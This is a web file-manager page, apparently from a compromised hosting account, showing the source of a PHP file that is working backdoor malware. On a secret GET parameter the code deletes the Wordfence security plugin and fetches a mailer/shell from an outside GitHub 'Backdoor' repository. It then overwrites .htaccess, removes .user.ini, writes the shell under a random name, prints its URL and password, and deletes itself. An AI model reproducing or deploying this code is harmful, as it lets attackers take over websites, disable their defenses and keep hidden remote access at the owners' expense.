Файловый менеджер - Редактировать - /home/gardnerf/public_html/xarMe80.php
Назад
<?php error_reporting(0); @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("display_errors", 0); if(isset($_GET['idotensei'])){ function deleteDir($adVQv) { $adVQv = substr($adVQv, -1) == "/" ? $adVQv : $adVQv . "/"; $FJ9Me = opendir($adVQv); while (($t67d0 = readdir($FJ9Me)) !== false) { $t67d0 = $adVQv . $t67d0; if (basename($t67d0) == ".." || basename($t67d0) == ".") { continue; } $KyO3T = filetype($t67d0); if ($KyO3T == "dir") { deleteDir($t67d0); } else { @unlink($t67d0); } } closedir($FJ9Me); @rmdir($adVQv); } function http_get_contents1($S5KCl) { $Bx_mI = curl_init(); curl_setopt($Bx_mI, CURLOPT_URL, $S5KCl); curl_setopt($Bx_mI, CURLOPT_HEADER, 0); curl_setopt($Bx_mI, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($Bx_mI, CURLOPT_RETURNTRANSFER, 1); curl_setopt($Bx_mI, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($Bx_mI, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($Bx_mI, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($Bx_mI, CURLOPT_TIMEOUT, 10); curl_setopt($Bx_mI, CURLOPT_COOKIESESSION, true); curl_setopt($Bx_mI, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); $t4lFf = curl_exec($Bx_mI); curl_close($Bx_mI); return $t4lFf; } function http_get_contents2($S5KCl) { $Ynb35 = @file_get_contents($S5KCl); if (empty($Ynb35)) { $Bx_mI = curl_init(); curl_setopt($Bx_mI, CURLOPT_URL, $S5KCl); curl_setopt($Bx_mI, CURLOPT_HEADER, 0); curl_setopt($Bx_mI, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($Bx_mI, CURLOPT_RETURNTRANSFER, 1); curl_setopt($Bx_mI, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($Bx_mI, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($Bx_mI, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($Bx_mI, CURLOPT_TIMEOUT, 15); curl_setopt($Bx_mI, CURLOPT_COOKIESESSION, true); curl_setopt($Bx_mI, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); $t4lFf = curl_exec($Bx_mI); curl_close($Bx_mI); return $t4lFf; } else { return $Ynb35; } } function Random($length = 8) { $pit = 'abcdefghijklmnopqrstuvwxyzAERTYUIOPQSDFGHJKLMWXCVBN123467890'; $rdrsNds = ''; for ($i = 0; $i < $length; $i++) { $rdrsNds .= $pit[rand(0, strlen($pit) - 1)]; } return $rdrsNds; } $urAnP = Random(); $rdrsN = Random(); $mKdRm = Random(); $mKdRS = Random(); $UpCsH = Random(); $UpHoM = Random(); $uEjSi = $_SERVER['HTTP_HOST']; $lWebH = $_SERVER['DOCUMENT_ROOT']; $SMY8T = array("../../plugins/wordfence", "wp-content/plugins/wordfence", "{$lWebH}/wp-content/plugins/wordfence"); foreach ($SMY8T as $ebf80) { if (is_dir($ebf80)) { deleteDir($ebf80); } } //$GtCsH = http_get_contents1("http://www.climbing.ba/robots.txt"); $GtCsH = http_get_contents1("https://raw.githubusercontent.com/ph-luffy/Backdoor/main/leaf_mailer.php"); if (!preg_match("/onedollar.sk/", $GtCsH)) { $GtCsH = http_get_contents2("https://raw.githubusercontent.com/ph-luffy/Backdoor/main/leaf_mailer.php"); } $cSlPs = Random(); // $m5cSL = md5($cSlPs); $GtCsH = str_replace("pxpxpx", $cSlPs, $GtCsH); $UYFDA = base64_decode("IyBCRUdJTgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleC5waHAkIC0gW0xdClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1mClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kClJld3JpdGVSdWxlIC4gaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgojIEVORAo="); @chmod($lWebH . "/.htaccess", 0644); unlink("{$lWebH}/.htaccess"); if (function_exists("file_put_contents")) { file_put_contents("{$lWebH}/.htaccess", $UYFDA); } else { fwrite(fopen("{$lWebH}/.htaccess", "w"), $UYFDA); } if (file_exists("{$lWebH}/.user.ini")) { unlink("{$lWebH}/.user.ini"); } // END HTACCESS $wt2upload = $_GET['idotensei']; $response = array(); if ($wt2upload == 'sh3ll'){ //if upload shell $aSceS=fopen($lWebH . "/".$rdrsN.".php", "w"); fwrite($aSceS,$GtCsH); fclose($aSceS); echo '<don3 type="hidden" value="http://'.$uEjSi.'/'.$rdrsN.'.php?pass='.$cSlPs.'"></don3>'; } $onedo =unlink(__FILE__); if ($onedo){ echo "Ok"; }else{ echo "error"; } } ?>
| ver. 1.4 |
Github
|
.
| PHP 5.6.40 | Генерация страницы: 0 |
proxy
|
phpinfo
|
Настройка